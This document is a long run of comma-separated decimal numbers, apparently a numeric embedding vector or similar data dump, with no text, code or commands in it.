-0.02253682166337967, 0.0022920442279428244, 0.011051412671804428, -0.010392667725682259, 0.00573107972741127, 0.013717391528189182, -0.018444852903485298, -0.0008563682204112411, 0.0337587334215641, 0.0286282729357481, -0.024117808789014816, 0.008191685192286968, 0.012392152100801468, 0.010725914500653744, 0.01059416588395834, 0.01398088876157999, -0.03803669661283493, -0.003543659346178174, -0.00027730248984880745, -0.03096875362098217, 0.018429353833198547, 0.010067170485854149, 0.03747870400547981, -0.002557479776442051, -0.017018865793943405, -0.0020905458368360996, -0.00514983432367444, -0.022428322583436966, -0.008517182432115078, -0.011617157608270645, 0.008989928290247917, 0.0025361673906445503, -0.006308449897915125, -0.01377939060330391, 0.0036618460435420275, 0.0003344582801219076, -0.01650736853480339, -0.0075406902469694614, 0.012089904397726059, -0.0023927935399115086, -0.005273833405226469, -0.007482565473765135, 0.0014385823160409927, 0.008834930136799812, -0.003098038025200367, 0.0012118966551497579, -0.0004998710355721414, -0.00698269484564662, -0.022118324413895607, 0.011547408066689968, -0.0020266089122742414, 0.0033440985716879368, 0.02121933177113533, 0.009485924616456032, 0.013616641983389854, 0.009842421859502792, -0.007641439326107502, 0.045662637799978256, -0.04138467088341713, 0.007284942083060741, 0.013469393365085125, -0.039214689284563065, -0.008152935653924942, -0.015546376816928387, 0.0037819701246917248, -0.014407135546207428, -0.028442274779081345, 0.021808326244354248, -0.009997420944273472, -0.004243091214448214, 0.0011528033064678311, 0.008648931048810482, -0.00910617783665657, -0.01195815484970808, 0.01264014933258295, 0.005700079724192619, -0.00023806843091733754, 0.02084733545780182, -0.022815819829702377, -0.015902873128652573, 0.025016801431775093, -0.011803156696259975, 0.004700337536633015, 0.0022009825333952904, -0.015236379578709602, -0.009423925541341305, 0.014740383252501488, 0.01547662727534771, -0.010935163125395775, 0.017592361196875572, 0.016026873141527176, 0.012725398875772953, -0.024055808782577515, -0.004649963229894638, 0.004541464149951935, -0.01482563279569149, 0.006106951739639044, -0.0013678641989827156, -0.014360636472702026, 0.013756141066551208, 0.017592361196875572, 0.02390081062912941, -0.009671923704445362, 0.002152545377612114, -0.0007289786008186638, -0.007649189326912165, 0.0011218036524951458, 0.023094816133379936, -0.013709641061723232, -0.007579439785331488, 0.0013610830064862967, -0.018677351996302605, 0.0739034116268158, -0.00017643219325691462, -0.019405845552682877, 0.0005177927669137716, -0.05986052379012108, -0.012988897040486336, -0.008377683348953724, -0.00823818426579237, -0.01143115945160389, -0.021141832694411278, 0.0015625813975930214, -0.016026873141527176, -0.021095333620905876, 0.032487742602825165, 0.002981788944453001, -0.008524931967258453, 0.0027454157825559378, -0.007366316393017769, 0.013213645666837692, 0.004932835698127747, 0.04823561757802963, 0.01429088693112135, 0.0010588353034108877, -0.015259629115462303, -0.006265825126320124, -0.0064091989770531654, -0.024381306022405624, 0.002770602935925126, -0.03676570951938629, 0.013089646585285664, -0.00573107972741127, -0.01610437221825123, -0.018289854750037193, -0.0035843465011566877, -0.01754586026072502, -0.01959184557199478, -0.0021157332230359316, -0.013469393365085125, -0.0011382722295820713, 0.004584088455885649, -0.01127616036683321, -0.020289339125156403, -0.009028678759932518, -0.021296830847859383, 0.006533198058605194, 0.013360894285142422, 0.00395440636202693, -0.01785585843026638, -0.026768287643790245, 0.012384401634335518, 0.00827693473547697, 0.015933873131871223, 0.004184966906905174, 0.009726173244416714, 0.001392082660458982, 0.014004139229655266, 0.000347778492141515, -0.013446143828332424, -0.022118324413895607, -0.042252663522958755, 0.025776294991374016, -0.004219841677695513, 0.016445370391011238, 0.006769571453332901, -0.010028420016169548, -0.000856852566357702, 0.004533714149147272, 0.011291660368442535, -0.02924826741218567, -0.011516408994793892, -0.004339965526014566, -0.004444589838385582, 0.03134075179696083, 0.001462800893932581, 0.0014860506635159254, -0.0004826758522540331, 0.015933873131871223, 0.023792311549186707, -0.018770352005958557, -0.02055283635854721, 0.0028442274779081345, -0.025838294997811317, -0.007447691168636084, 0.009121677838265896, -0.015290629118680954, 0.013399643823504448, 0.01294239703565836, 0.02151382900774479, -0.023668311536312103, -0.0004872773715760559, 0.008021186105906963, 0.016274871304631233, 0.022784819826483727, -0.019684843719005585, -0.021823827177286148, 0.01917334832251072, -0.0061805760487914085, -0.0007420566398650408, 0.04305865988135338, 0.007048569153994322, -0.00805993564426899, -0.0031987871043384075, 0.011741156689822674, -0.034192729741334915, 0.01163265760987997, -0.017979856580495834, 0.023342814296483994, -0.0037974698934704065, 0.001141178421676159, 0.01587187498807907, -0.008377683348953724, 0.015236379578709602, 0.024505306035280228, 0.030550258234143257, 0.004832086618989706, -0.011834155768156052, 0.0018212355207651854, -0.019638344645500183, 0.01655386947095394, 0.005138209089636803, -0.008230434730648994, 0.011066912673413754, 0.008966678753495216, 0.026675287634134293, 0.007021444384008646, 0.006781196221709251, 0.0006655259639956057, 0.03261174261569977, -0.012779648415744305, 0.029418766498565674, -0.004719712771475315, -0.0006708540604449809, -0.01918884739279747, -0.03834669664502144, -0.007788688410073519, -0.006459573749452829, 0.02225782349705696, -0.005180833861231804, -0.023792311549186707, 0.004956085700541735, -0.011717907153069973, -0.013229144737124443, -0.013500393368303776, 0.006258075591176748, -0.010307418182492256, 0.0109274135902524, -0.00943167507648468, -0.01718936301767826, -0.027031784877181053, 0.00403384305536747, 0.004622838459908962, 0.012221653014421463, 0.0014841132797300816, 0.0015897061675786972, 0.0019152035238221288, -0.0252802986651659, -0.0039350311271846294, -0.01043916679918766, -0.010160169564187527, 0.029465265572071075, -0.003998968284577131, -0.01652286946773529, -0.007959187030792236, -0.017607860267162323, -0.023776810616254807, -0.02115733176469803, -0.02492380328476429, -0.03174374997615814, 0.007079568691551685, 0.01164040807634592, 0.006835445761680603, 0.008625681512057781, 0.001894859946332872, 0.004088092595338821, -0.005696204956620932, 0.0053552077151834965, 0.0035359093453735113, -0.013570141978561878, 0.00613407650962472, 0.012632399797439575, -0.011849655769765377, 0.03394472971558571, -0.0022126075346022844, 0.0218548271805048, 0.015887374058365822, -0.011221910826861858, 0.008455183357000351, 0.009679673239588737, -0.005777579266577959, 0.01613537222146988, -0.0014676445862278342, 0.009299926459789276, -0.008579181507229805, 0.0006083701737225056, -0.029852762818336487, -0.011516408994793892, -0.012725398875772953, -0.00573107972741127, -0.015236379578709602, 0.014732632786035538, 0.001668174285441637, -0.001970421988517046, 0.020444337278604507, -0.0011576471151784062, 0.022645320743322372, -0.00790106225758791, 0.009175927378237247, 0.005328082945197821, 0.014414886012673378, 0.006137951277196407, 0.017421862110495567, -0.006087576504796743, 0.0058589535765349865, 0.03236374258995056, 0.020754335448145866, 0.016739867627620697, 0.015732375904917717, -0.005657454952597618, -0.014019639231264591, 0.00354172196239233, -0.0056729549542069435, 0.015461127273738384, -0.0006645572138950229, -0.0017970169428735971, -0.010160169564187527, -0.00638207420706749, 0.014004139229655266, 0.008641181513667107, -0.01956084556877613, -0.010043920017778873, -0.013035397045314312, -0.014895382337272167, -0.010059420019388199, 0.009664173237979412, 0.005917077884078026, -0.0036754084285348654, 0.0013668953906744719, 0.005405582021921873, 0.00010298941924702376, 0.006750196684151888, 0.006277450360357761, -0.004064842592924833, -0.015220879577100277, -0.005242833402007818, -0.0012060841545462608, 0.019436845555901527, 0.012508400715887547, -0.015228629112243652, -0.006261950358748436, 0.011206410825252533, 0.004905710928142071, -0.014399386011064053, -0.002369543770328164, 0.011066912673413754, 0.011369159445166588, 0.0109274135902524, -0.024365806952118874, 0.007467065937817097, -0.005703954957425594, -0.0035630343481898308, -0.015515376813709736, -0.0066184476017951965, 0.013601141981780529, 0.0050529600121080875, -0.006261950358748436, -0.006025577429682016, -0.008811679668724537, -0.022304322570562363, -0.015887374058365822, -0.006765696220099926, 0.0018028294434770942, -0.00012569432146847248, -0.022474821656942368, -0.007656939327716827, 0.0024916052352637053, -0.013918889686465263, 0.008354433812201023, 0.005014210008084774, 0.005529581103473902, -0.005525706335902214, -0.01914234831929207, 0.02253682166337967, -0.00341384788043797, 0.00045385578414425254, 0.01074916496872902, -0.0031600373331457376, 0.017034364864230156, 0.0021893575321882963, -0.002286231843754649, 0.0001759478182066232, 0.0020595460664480925, -0.0020886084530502558, -0.008672181516885757, -0.010725914500653744, -0.00588995311409235, 0.0038284696638584137, -0.024675805121660233, 0.0020905458368360996, 0.014236637391149998, 0.008455183357000351, 0.0008791336440481246, -0.018785851076245308, -0.0010665853042155504, -0.003919531591236591, -0.02292431890964508, 0.022955317050218582, -0.019684843719005585, -0.01586412452161312, -0.002164170378819108, -0.0034351602662354708, 0.040547680109739304, -0.015902873128652573, -0.0020653586834669113, -0.0002666463260538876, -0.020475337281823158, -0.011082411743700504, -0.005812454037368298, -0.017406361177563667, 0.0016642992850393057, -0.008617931976914406, 0.021637829020619392, -0.004076467826962471, -0.006552572827786207, -0.016398869454860687, 0.0014192075468599796, 0.04209766536951065, -0.009067428298294544, -0.007067943923175335, -0.019359346479177475, 0.00809868611395359, 0.011051412671804428, -0.002968226559460163, -0.0034642224200069904, -0.010307418182492256, -0.01298114750534296, 0.01499613095074892, -0.013887889683246613, -0.013500393368303776, -0.02118833176791668, 0.00673857145011425, -0.00681607099249959, -0.017576860263943672, 0.016615867614746094, 0.001552893896587193, 0.01026091817766428, 0.0007517440244555473, -0.034564726054668427, 0.016631368547677994, -0.0017572985962033272, -0.006447948981076479, -0.004781712312251329, 0.021405329927802086, -0.0019307034090161324, -0.007257817313075066, 0.04067167639732361, -0.010578665882349014, -0.02621029131114483, 0.011012663133442402, 0.0051188343204557896, -0.0185068529099226, -0.005114959552884102, -0.002133170608431101, 0.0005008397856727242, -0.027109285816550255, 0.006777321454137564, 0.029170768335461617, 0.005114959552884102, -0.005688454955816269, 0.0030244134832173586, 0.00556445587426424, 0.011152161285281181, 0.0016449243994429708, 0.009423925541341305, -0.000017195176042150706, -0.013508142903447151, -0.008439683355391026, 0.0006204794626682997, 0.011624908074736595, -0.018072856590151787, 0.01954534463584423, 0.0049832104705274105, -0.015654874965548515, -0.0008336027385666966, 0.017592361196875572, -0.0007439940818585455, -0.010873164050281048, 0.007873937487602234, 0.012492900714278221, 0.007060193922370672, -0.012384401634335518, -0.0044097150675952435, -0.012361152097582817, 0.0024664178490638733, -0.008462932892143726, -0.015608375892043114, -0.010834414511919022, -0.009028678759932518, -0.006060451734811068, -0.005951952654868364, 0.008470682427287102, -0.00006629830022575334, 0.008710931055247784, -0.007087318692356348, -0.010067170485854149, -0.031077252700924873, 0.006854820530861616, -0.019095849245786667, -0.0012332089245319366, 0.005843453574925661, 0.022133825346827507, -0.027171283960342407, 0.023296315222978592, 0.0038362196646630764, 0.011733407154679298, -0.0403926782310009, -0.010470166802406311, 0.008563682436943054, 0.006602947600185871, 0.009687422774732113, 0.008493932895362377, -0.0032569116447120905, 0.02290881797671318, 0.023017317056655884, -0.002607854316011071, 0.0026853536255657673, 0.006339449901133776, 0.016073372215032578, 0.013019897043704987, 0.010408167727291584, 0.009532424621284008, -0.026504790410399437, -0.0010995225748047233, -0.0024121683090925217, -0.015453377738595009, 0.003214287105947733, 0.021033333614468575, -0.005068460013717413, 0.017902357503771782, 0.017096364870667458, 0.004785587079823017, 0.016739867627620697, 0.026675287634134293, -0.02590029500424862, 0.006695946678519249, 0.00412296736612916, -0.025636795908212662, -0.012361152097582817, -0.019421346485614777, -0.006587447598576546, 0.005568330641835928, 0.017685359343886375, 0.018010856583714485, -0.01125291083008051, -0.000024869432309060358, -0.0028306650929152966, 0.004568588919937611, -0.005568330641835928, 0.0020246715284883976, -0.007191943004727364, 0.030891254544258118, -0.0010598041117191315, 0.014926381409168243, -0.003012788714841008, -0.0167863667011261, 0.012004654854536057, -0.019405845552682877, 0.040950674563646317, -0.01756136119365692, 0.020955834537744522, -0.010640665888786316, 0.01080341450870037, -0.014205637387931347, -0.003189099719747901, 0.01959184557199478, -0.007579439785331488, -0.002326918998733163, 0.0018406104063615203, -0.0029333517886698246, -0.01078016497194767, -0.008865930140018463, 0.004638337995857, 0.020041340962052345, 0.03605271503329277, 0.0037374079693108797, -0.006509948521852493, -0.007784813176840544, -0.015189879573881626, -0.01587187498807907, -0.007005944382399321, -0.0028694146312773228, 0.0005313551519066095, 0.028767772018909454, -0.005525706335902214, 0.010361667722463608, -0.01748386211693287, 0.007598814554512501, -0.03264274075627327, -0.0007115412154234946, 0.004828211851418018, -0.0018280167132616043, 0.0013087708503007889, -0.005378457251936197, -0.0054908315651118755, 0.04203566536307335, -0.004088092595338821, -0.0037974698934704065, 0.008974429219961166, 0.018026357516646385, -0.011353660374879837, 0.0031832873355597258, 0.006149576045572758, -0.024799803271889687, -0.0038710942026227713, -0.003632783656939864, -0.016026873141527176, -0.027217784896492958, 0.010012920945882797, -0.004591838456690311, -0.022815819829702377, 0.02326531521975994, -0.02386981062591076, 0.001706923940218985, 0.010198919102549553, 0.01951434463262558, 0.011671407148241997, 0.0002860211825463921, 0.004839836619794369, 0.00606820173561573, -0.004750712309032679, -0.01613537222146988, 0.020723335444927216, -0.019963841885328293, 0.0009532424155622721, 0.002720228396356106, -0.009640923701226711, -0.006839320994913578, -0.005211833864450455, 0.02452080510556698, -0.011152161285281181, 0.010214419104158878, -0.009268926456570625, -0.01078016497194767, -0.01549987681210041, 0.0003305833088234067, -0.012027904391288757, -0.0019442657940089703, -0.03165074810385704, 0.0025807295460253954, -0.0038555944338440895, 0.012872647494077682, -0.0015412690117955208, -0.022149324417114258, -0.01467063371092081, -0.011198661290109158, -0.017049863934516907, -0.004696462769061327, 0.0029275391716510057, -0.016755366697907448, 0.027822280302643776, -0.0038420320488512516, 0.00539783202111721, 0.000921273953281343, 0.008222685195505619, 0.017406361177563667, -0.007137693464756012, 0.026132792234420776, -0.004401965066790581, 0.006509948521852493, -0.013763890601694584, -0.00958667416125536, -0.0006272606551647186, 0.002855852246284485, -0.020707836374640465, 0.017096364870667458, 0.004130717366933823, -0.0009106177603825927, -0.012926897034049034, -0.031170252710580826, -0.009664173237979412, 0.021126331761479378, -0.0035087845753878355, 0.005696204956620932, -0.006858695764094591, -0.003690908197313547, -0.003388660727068782, -0.015228629112243652, 0.001771829673089087, -0.02932576835155487, 0.01883235014975071, -0.006083701737225056, -0.0006403386942110956, 0.008617931976914406, 0.012190653011202812, -0.014050638303160667, -0.006723071914166212, 0.00040348118636757135, -0.010307418182492256, -0.027481282129883766, 0.02393181063234806, 0.018754851073026657, 0.015205379575490952, -0.012020154856145382, 0.0038865942042320967, 0.005514081101864576, -0.004591838456690311, -0.01329889427870512, 0.02627229131758213, -0.006048826966434717, -0.004088092595338821, -0.004119092132896185, -0.004022218286991119, -0.00042624661000445485, 0.03946268558502197, 0.03896668925881386, -0.0052815829403698444, -0.001345583121292293, 0.0006209638086147606, 0.015980374068021774, 0.012547150254249573, -0.006626197602599859, 0.0050529600121080875, 0.0000309240713249892, 0.020366838201880455, -0.003568846732378006, 0.01983984187245369, -0.004874711390584707, -0.007405066397041082, -0.005944202654063702, 0.007323692087084055, 0.008827179670333862, -0.00497158570215106, -0.017452862113714218, 0.022459322586655617, 0.013190395198762417, 0.005064584780484438, -0.017344363033771515, -0.015383628197014332, -0.012926897034049034, 0.0038052198942750692, 0.028752271085977554, 0.001900672446936369, 0.0024664178490638733, -0.0006083701737225056, 0.018971849232912064, -0.0009304769919253886, 0.025419797748327255, -0.008679931052029133, -0.003723845584318042, -0.0109506631270051, -0.0010288043413311243, -0.008176185190677643, 0.02320331521332264, 0.02723328396677971, -0.030751755461096764, 0.01479463279247284, 0.0011566783068701625, -0.013337643817067146, -0.005424956791102886, -0.014004139229655266, -0.004246966447681189, -0.0036308462731540203, 0.011136661283671856, -0.005982952658087015, -0.005568330641835928, -0.019948340952396393, 0.0013639891985803843, 0.002286231843754649, 0.01214415393769741, -0.0032297868747264147, 0.02258332073688507, 0.012702149339020252, -0.02828727476298809, -0.003260786645114422, -0.03061225637793541, -0.005068460013717413, -0.011772156693041325, 0.010493416339159012, 0.015399128198623657, -0.02659778855741024, -0.001720486325211823, -0.009834672324359417, -0.003960218746215105, -0.00032767708762548864, -0.01365539152175188, -0.019963841885328293, -0.02287781797349453, -0.009005428291857243, 0.0005328082479536533, -0.014445885084569454, 0.0004884882946498692, 0.0042934659868478775, 0.007819687947630882, 0.005517956335097551, -0.0037141579668968916, -0.009129427373409271, -0.01178765669465065, -0.0009077115682885051, -0.009896671399474144, -0.01711186394095421, -0.016243871301412582, -0.0018144543282687664, -0.015445627272129059, -0.0168483667075634, -0.008176185190677643, -0.03267374262213707, 0.0034622850362211466, -0.0020789210684597492, 0.012601399794220924, -0.0025613547768443823, 0.004421339835971594, -0.024427806958556175, 0.0218393262475729, -0.01550762727856636, 0.017049863934516907, -0.0003407550975680351, -0.002067296067252755, -0.005917077884078026, 0.004014468286186457, -0.007207443006336689, 0.002512917621061206, -0.01687936671078205, -0.010888664051890373, 0.007761563640087843, 0.005033585242927074, -0.018382854759693146, -0.00823818426579237, 0.04612763598561287, 0.006889695301651955, -0.0021176706068217754, 0.01584862358868122, 0.02893827110528946, -0.012167403474450111, -0.002621416701003909, 0.012345652095973492, 0.002917851787060499, -0.021668829023838043, 0.013291144743561745, -0.02259882166981697, -0.01125291083008051, 0.004138467367738485, 0.005498581565916538, 0.008315684273838997, -0.02221132442355156, -0.019359346479177475, -0.009323175996541977, -0.018041856586933136, -0.018041856586933136, 0.010160169564187527, -0.00007083928358042613, 0.02056833729147911, -0.0062464503571391106, 0.013399643823504448, -0.0005768860573880374, 0.021451829001307487, 0.019049348309636116, 0.005204083863645792, 0.022102825343608856, 0.001282614772208035, 0.025171799585223198, 0.003427410265430808, -0.0126478997990489, -0.015592875890433788, 0.010539916343986988, -0.017917858436703682, 0.0026059169322252274, -0.013949889689683914, 0.004781712312251329, 0.005936453118920326, -0.0008471651817671955, -0.008765180595219135, 0.01226040255278349, -0.018987350165843964, -0.019607344642281532, 0.0020382339134812355, -0.011593908071517944, 0.01059416588395834, 0.008718680590391159, -0.007385691627860069, -0.00506071001291275, -0.00032816146267578006, -0.013337643817067146, 0.004060967825353146, 0.006192200817167759, 0.018692851066589355, -0.006692071910947561, -0.01146215945482254, -0.009478175081312656, -0.0201808400452137, 0.0370757058262825, 0.012508400715887547, 0.007013694383203983, -0.00066358846379444, -0.0018541727913543582, 0.00529708294197917, 0.006285200361162424, -0.01649186946451664, -0.0235598124563694, 0.01611987128853798, -0.008338933810591698, -0.01213640347123146, 0.0013048958498984575, 0.01822785474359989, -0.006316199898719788, -0.008858179673552513, -0.006331699900329113, 0.007997936569154263, 0.0013000521576032043, 0.013546892441809177, 0.012384401634335518, -0.002898477017879486, 0.003189099719747901, 0.008734180592000484, -0.00573107972741127, -0.011020412668585777, -0.014407135546207428, -0.0008093842188827693, 0.01581762544810772, -0.0009711641469039023, -0.019948340952396393, -0.007815812714397907, 0.009113927371799946, 0.006672697141766548, 0.019777843728661537, -0.014174637384712696, 0.0037587201222777367, -0.012120903469622135, 0.009144927375018597, 0.002815165091305971, -0.00766468932852149, 0.01991734281182289, -0.008199434727430344, 0.019793342798948288, -0.015995873138308525, -0.0020111091434955597, -0.009462675079703331, -0.013081896118819714, -0.017669860273599625, 0.0005972296348772943, -0.02258332073688507, -0.005599330645054579, -0.017096364870667458, 0.017685359343886375, 0.006440198980271816, 0.0005458862870000303, -0.022986317053437233, 0.007548440247774124, 0.0005759173072874546, 0.018987350165843964, -0.016801867634058, -0.0035359093453735113, -0.005529581103473902, -0.009958671405911446, 0.015902873128652573, 0.014903131872415543, 0.00132717692758888, -0.0000762884592404589, -0.015530876815319061, -0.0061108265072107315, -0.0010055545717477798, -0.008300184272229671, -0.02219582349061966, 0.006951694842427969, -0.0073546916246414185, 0.0015683937817811966, -0.0009285394917242229, -0.0018909850623458624, -0.01615087129175663, -0.011648157611489296, 0.003898218972608447, -0.02732628397643566, 0.00028650552849285305, 0.0017020802479237318, 0.01985534280538559, -0.0031135377939790487, -0.01280289888381958, -0.024443306028842926, -0.0018764538690447807, 0.018553351983428, -0.0010220231488347054, 0.01887885108590126, -0.0002680994221009314, -0.013407393358647823, 0.014035138301551342, 0.008331184275448322, -0.015709124505519867, -0.002842289861291647, 0.00991217140108347, -0.014693883247673512, -0.000015000369785411749, -0.011136661283671856, 0.005006460472941399, -0.01779385842382908, 0.040175680071115494, 0.01329889427870512, 0.015949374064803123, -0.00004580334643833339, -0.006265825126320124, -0.0030224760994315147, 0.006199950817972422, -0.001075303996913135, -0.008486182428896427, 0.006943944841623306, 0.005033585242927074, 0.013329894281923771, -0.019932841882109642, -0.005300958175212145, -0.019126849249005318, 0.000843774585518986, 0.018026357516646385, -0.009230176918208599, 0.013887889683246613, -0.006812195759266615, 0.02490830235183239, 0.0185688529163599, -0.030844755470752716, -0.00480496184900403, -0.017623359337449074, 0.008865930140018463, 0.008695431053638458, -0.002972101327031851, -0.005227333400398493, 0.009137177839875221, -0.01748386211693287, 0.004669337999075651, 0.0073546916246414185, -0.010640665888786316, -0.0046150884591042995, 0.008199434727430344, 0.002282356843352318, -0.011121162213385105, 0.014430386014282703, 0.012601399794220924, 0.007974687032401562, 0.009222426451742649, 0.013794890604913235, 0.015228629112243652, 0.01143115945160389, 0.032549742609262466, -0.016755366697907448, -0.0031658499501645565, 0.007312066853046417, 0.009958671405911446, -0.02824077568948269, 0.0015180192422121763, 0.0019694531802088022, -0.02193232625722885, -0.001623612130060792, 0.020056840032339096, 0.038191698491573334, -0.0010026482632383704, -0.015406877733767033, 0.01213640347123146, 0.007777063176035881, 0.021963326260447502, -0.0052815829403698444, 0.020986832678318024, -0.002338543999940157, 0.02354431338608265, -0.0008742899517528713, 0.0041539669036865234, -0.000818102911580354, 0.0027163533959537745, -0.009385176002979279, 0.01396538969129324, 0.010818914510309696, -0.00520795863121748, -0.006281325127929449, 0.01920434832572937, 0.012810648418962955, 0.008687681518495083, 0.022459322586655617, 0.0029779139440506697, -0.03202274441719055, -0.013546892441809177, 0.031201252713799477, -0.00565358018502593, -0.007370191626250744, -0.01650736853480339, 0.009834672324359417, -0.012492900714278221, 0.00975717231631279, -0.0001067432967829518, -0.0041539669036865234, -0.0056729549542069435, 0.01788685843348503, -0.006118576508015394, 0.006099201738834381, 0.0009939295705407858, 0.02021184004843235, -0.009292175993323326, 0.015244129113852978, 0.01818135567009449, 0.007598814554512501, 0.0019597657956182957, -0.011059162206947803, 0.01610437221825123, 0.003030225867405534, -0.02789977937936783, -0.011981405317783356, 0.005835703574120998, 0.012864897958934307, -0.0030244134832173586, -0.01811935566365719, -0.01622837223112583, -0.0044794646091759205, -0.0007909780833870173, 0.007215193007141352, -0.00538620725274086, 0.015445627272129059, 0.011741156689822674, 0.030147260054945946, -0.0027299157809466124, 0.004773962311446667, -0.02324981614947319, 0.008734180592000484, -0.004460089839994907, 0.0017011115560308099, -0.009090677835047245, -0.00606820173561573, 0.006974944844841957, 0.012190653011202812, 0.01463963370770216, -0.01160940807312727, 0.0063665746711194515, 0.00537458248436451, -0.01746836118400097, -0.00790106225758791, 0.012492900714278221, 0.0009779453976079822, -0.008672181516885757, 0.004855336621403694, 0.00823818426579237, -0.017700860276818275, -0.015631625428795815, -0.024660304188728333, -0.0016352370148524642, -0.0019423282938078046, -0.001842547906562686, -0.026504790410399437, 0.004386465065181255, 0.001011366955935955, 0.026954285800457, -0.018987350165843964, 0.015515376813709736, 0.0168483667075634, -0.033479735255241394, -0.036920707672834396, -0.01889435015618801, -0.004952210932970047, 0.003227849490940571, -0.004766212310642004, 0.01650736853480339, -0.0030825380235910416, 0.005638080183416605, 0.0017466424033045769, -0.0032065371051430702, 0.002972101327031851, -0.0007488378323614597, 0.009059677831828594, -0.002662103855982423, -0.015616126358509064, -0.008974429219961166, 0.004785587079823017, -0.020320339128375053, -0.004060967825353146, 0.0034506600350141525, 0.009470424614846706, 0.006172826047986746, 0.011384659446775913, -0.019700344651937485, -0.02996126189827919, -0.01178765669465065, -0.029108768329024315, 0.0013184583513066173, 0.001661393092945218, 0.0033014738000929356, -0.007281067315489054, -0.0012680836953222752, -0.008625681512057781, 0.0019491094863042235, 0.00590932834893465, 0.01990184187889099, -0.0035862841177731752, 0.015716874971985817, -0.0011033974587917328, 0.007695688866078854, 0.013756141066551208, -0.009044177830219269, 0.03667270764708519, 0.016615867614746094, -0.00978817231953144, -0.0045492141507565975, -0.030503757297992706, 0.012911397963762283, 0.0041113425977528095, 0.009540174156427383, -0.01261689979583025, -0.006002327427268028, -0.02991476282477379, 0.00638207420706749, 0.00994317140430212, -0.03000776283442974, -0.00809093564748764, -0.010911913588643074, -0.0013862702762708068, -0.01880135014653206, 0.016305871307849884, 0.0014860506635159254, 0.017080863937735558, 0.00824593473225832, -0.03577371686697006, 0.008106435649096966, 0.005746579263359308, 0.008346684277057648, 0.0020537336822599173, -0.01990184187889099, 0.010191169567406178, 0.014120387844741344, -0.003979593515396118, 0.0074903154745697975, -0.006715321913361549, -0.03676570951938629, 0.00910617783665657, 0.006564198061823845, 0.027744779363274574, 0.0010065232636407018, 0.002809352707117796, 0.01822785474359989, 0.009873421862721443, 0.009857921861112118, 0.0026524164713919163, -0.007269442547112703, -0.004332215525209904, -0.004347715526819229, -0.00824593473225832, -0.0018861412536352873, 0.012423151172697544, -0.012539400719106197, 0.0021099208388477564, -0.00859468150883913, -0.006909070070832968, 0.010679415427148342, 0.00943167507648468, 0.019002849236130714, -0.02495480142533779, -0.015670375898480415, -0.020118840038776398, 0.021467329934239388, 0.01298114750534296, -0.021451829001307487, -0.00975717231631279, -0.005630330182611942, 0.005645830184221268, 0.016274871304631233, -0.005339707713574171, -0.0049173361621797085, -0.009547924622893333, 0.017251363024115562, -0.01580212451517582, 0.0026853536255657673, -0.017390862107276917, 0.015344878658652306, 0.0015635500894859433, -0.014910881407558918, -0.008377683348953724, 0.022428322583436966, -0.015933873131871223, -0.02318781614303589, -0.018444852903485298, -0.03242574259638786, 0.005095584783703089, -0.012213903479278088, 0.007377941627055407, 0.0042004669085145, 0.0006243544048629701, 0.01925084739923477, 0.013500393368303776, 0.03096875362098217, 0.01143115945160389, -0.01749936118721962, 0.02391630969941616, 0.025807294994592667, 0.019359346479177475, 0.0033440985716879368, 0.007393441163003445, 0.012632399797439575, -0.009633173234760761, 0.010973912663757801, 0.017902357503771782, 0.015019380487501621, 0.014934131875634193, 0.009834672324359417, 0.00739731639623642, 0.017437361180782318, -0.007137693464756012, 0.005091709550470114, 0.006300699897110462, 0.011152161285281181, 0.005483081564307213, 0.005153709091246128, 0.009563424624502659, -0.005316457711160183, 0.019607344642281532, 0.015127880498766899, -0.0007004006765782833, -0.0048475866205990314, 0.0014676445862278342, -0.01613537222146988, 0.005862828344106674, 0.006013952195644379, 0.011989154852926731, -0.014538885094225407, -0.00421209167689085, 0.015639375895261765, -0.0013736765831708908, 0.014910881407558918, -0.006835445761680603, -0.014329636469483376, 0.005622580647468567, -0.020785335451364517, 0.025652296841144562, 0.006358824670314789, 0.014221137389540672, -0.006711446680128574, -0.009958671405911446, -0.007637564558535814, 0.030162760987877846, 0.0003838641569018364, -0.019390346482396126, -0.011152161285281181, -0.0109274135902524, 0.00907517783343792, -0.005688454955816269, -0.005591580644249916, -0.0024489806964993477, -0.00018975240527652204, 0.0016575180925428867, -0.014593134634196758, 0.006595197599381208, -0.005525706335902214, 0.01646086946129799, 0.004246966447681189, -0.008966678753495216, 0.031185751780867577, 0.01532162819057703, -0.011996905319392681, 0.010183419100940228, -0.013570141978561878, 0.026706287637352943, -0.0006863539456389844, -0.010764664970338345, -0.009927671402692795, 0.011469908989965916, -0.00269310362637043, -0.03301473706960678, 0.013818140141665936, -0.008641181513667107, -0.0012109278468415141, 0.010051670484244823, 0.013368643820285797, -0.012097653932869434, 0.01717386394739151, -0.03169724717736244, 0.013159395195543766, 0.010028420016169548, 0.010733664967119694, 0.015995873138308525, 0.005661330185830593, -0.00841643288731575, 0.010059420019388199, 0.007346941623836756, -0.011144411750137806, -0.002764790551736951, 0.018072856590151787, -0.010880913585424423, 0.003477785037830472, -0.017406361177563667, -0.0003422082227189094, -0.0071686930023133755, 0.012748649343848228, 0.01687936671078205, -0.0032045994885265827, -0.020630337297916412, 0.006250325590372086, 0.014321886003017426, 0.004909586161375046, -0.013554642908275127, -0.019064849242568016, 0.021947825327515602, -0.007129943463951349, -0.008982178755104542, 0.0012157716555520892, 0.001359145506285131, -0.009462675079703331, 0.013376394286751747, -0.017096364870667458, 0.011113411746919155, 0.0006592291756533086, 0.006393699441105127, 0.009625423699617386, 0.03261174261569977, 0.019328346475958824, 0.00004928476482746191, -0.013198145665228367, 0.004522088915109634, 0.01446913555264473, -0.011508658528327942, -0.006289075128734112, -0.0185068529099226, 0.0017447049031034112, -0.0077460636384785175, -0.003034100867807865, 0.02687678672373295, 0.026024293154478073, 0.008493932895362377, -0.01580987498164177, -0.013004397042095661, -0.005765954498201609, 0.0061108265072107315, 0.011012663133442402, 0.021761827170848846, -0.012151903472840786, -0.011260660365223885, 0.011702407151460648, -0.000760462717153132, -0.011221910826861858, 0.0024974176194518805, 0.0072384425438940525, -0.002712478395551443, 0.014546634629368782, 0.027031784877181053, -0.00975717231631279, 0.02290881797671318, -0.00940842553973198, -0.013446143828332424, -0.003762595122680068, 0.025109801441431046, 0.016088873147964478, 0.016321370378136635, 0.01043916679918766, -0.01279514841735363, 0.003952468745410442, 0.016662368550896645, 0.0019936717581003904, 0.004088092595338821, 0.0026175417006015778, -0.005002585239708424, -0.008563682436943054, 0.012578150257468224, 0.006079826969653368, 0.02286231890320778, 0.012430901639163494, 0.005920953117311001, -0.02354431338608265, -0.002884914632886648, 0.015375877730548382, 0.02019633911550045, -0.004758462309837341, 0.00539783202111721, -0.012539400719106197, 0.011221910826861858, 